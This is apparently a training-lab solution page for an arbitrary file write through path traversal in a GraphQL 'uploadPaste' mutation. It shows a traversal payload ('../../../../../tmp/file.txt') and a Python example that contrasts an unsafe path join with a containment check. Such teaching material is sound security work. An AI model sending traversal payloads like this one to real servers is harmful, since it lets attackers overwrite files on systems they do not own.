<!-- Start -->
<h3 style="color:purple" id="misc-filewrite"><b>Miscellaneous :: Arbitrary File Write // Path Traversal</b></h3>
<hr />
<h5>Problem Statement</h5>
<p>
  The <code>uploadPaste</code> mutation lets a user upload a paste from their computer by supplying the file content
  along with a filename. Pastes are then stored on the server under a dedicated folder. The <code>filename</code>
  argument accepts any string, so the file can be written to any location on the server's filesystem by traversing
  folders with <code>../../</code> sequences.
</p>
<h5>Resources</h5>
<ul>
  <li>
    <a href="https://owasp.org/www-community/attacks/Path_Traversal" target="_blank">
      <i class="fa fa-newspaper"></i> OWASP - Path Traversal
    </a>
  </li>
</ul>
<h5>Exploitation Solution <button class="reveal" onclick="reveal('sol-misc-filewrite')">Show</button></h5>
<div id="sol-misc-filewrite" style="display:none">
  <pre class="bash">
# Traverse the filesystem and place the file where you desire.
mutation {
  uploadPaste(filename:"../../../../../tmp/file.txt", content:"hi"){
    result
  }
}</pre>
</div>
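<p>
  The flaw and one way to close it, as an added example that is not the application's own code: the function names,
  the exception class and the <code>/srv/app/pastes</code> folder are hypothetical, and the traversal string is the
  one from the solution above.
</p>

```python
import os
import tempfile
from pathlib import Path

class UnsafeFilename(ValueError):
    """Raised when a client-supplied filename would leave the upload folder."""

def naive_target(upload_dir, filename):
    # Pattern described above: the client string is joined to the folder as-is,
    # so "../" segments walk out of it once the path is normalised.
    return Path(os.path.normpath(os.path.join(upload_dir, filename)))

def safe_target(upload_dir, filename):
    # 1. Accept a bare file name only: no separators, no NUL, no dot entries.
    if not filename or filename in (".", "..") or "\x00" in filename:
        raise UnsafeFilename(filename)
    if "/" in filename or "\\" in filename:
        raise UnsafeFilename(filename)
    # 2. Defence in depth: resolve symlinks and confirm containment.
    base = Path(upload_dir).resolve()
    target = (base / filename).resolve()
    if base not in target.parents:
        raise UnsafeFilename(filename)
    return target

def write_paste(upload_dir, filename, content):
    target = safe_target(upload_dir, filename)
    # Mode "x" refuses to overwrite a file that already exists.
    with open(target, "x", encoding="utf-8") as fh:
        fh.write(content)
    return target

if __name__ == "__main__":
    # Constructed input; /srv/app/pastes is a hypothetical upload folder.
    print(naive_target("/srv/app/pastes", "../../../../../tmp/file.txt"))
    with tempfile.TemporaryDirectory() as d:
        print(write_paste(d, "note.txt", "hi").name)
        try:
            write_paste(d, "../../../../../tmp/file.txt", "hi")
        except UnsafeFilename as exc:
            print("rejected:", exc)
```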
<!-- End -->